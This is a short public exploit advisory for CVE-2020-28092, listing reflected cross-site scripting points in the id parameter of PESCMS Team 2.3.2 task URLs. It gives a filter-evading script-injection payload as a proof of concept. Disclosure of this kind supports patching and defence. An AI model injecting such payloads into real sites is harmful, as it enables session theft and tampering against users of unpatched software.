PESCMS TEAM version 2.3.2 suffers from multiple cross site scripting vulnerabilities.
78b604f0c2a46c0ed39c6ce7e7decc2310a9a52f7f58a4dea0be82cd2e47ee5b
# Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.pescms.com/
# Software Link: https://github.com/lazyphp/PESCMS-TEAM
# Version: PESCMS Team 2.3.2
# CVE: CVE-2020-28092
PESCMS Team 2.3.2 has multiple reflected XSS via the id
parameter:?g=Team&m=Task&a=my&status=3&id=,?g=Team&m=Task&a=my&status=0&id=,?g=Team&m=Task&a=my&status=1&id=,?g=Team&m=Task&a=my&status=10&id=
please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6
now I input payload :
"><ScRiPt>alert(1)</ScRiPt>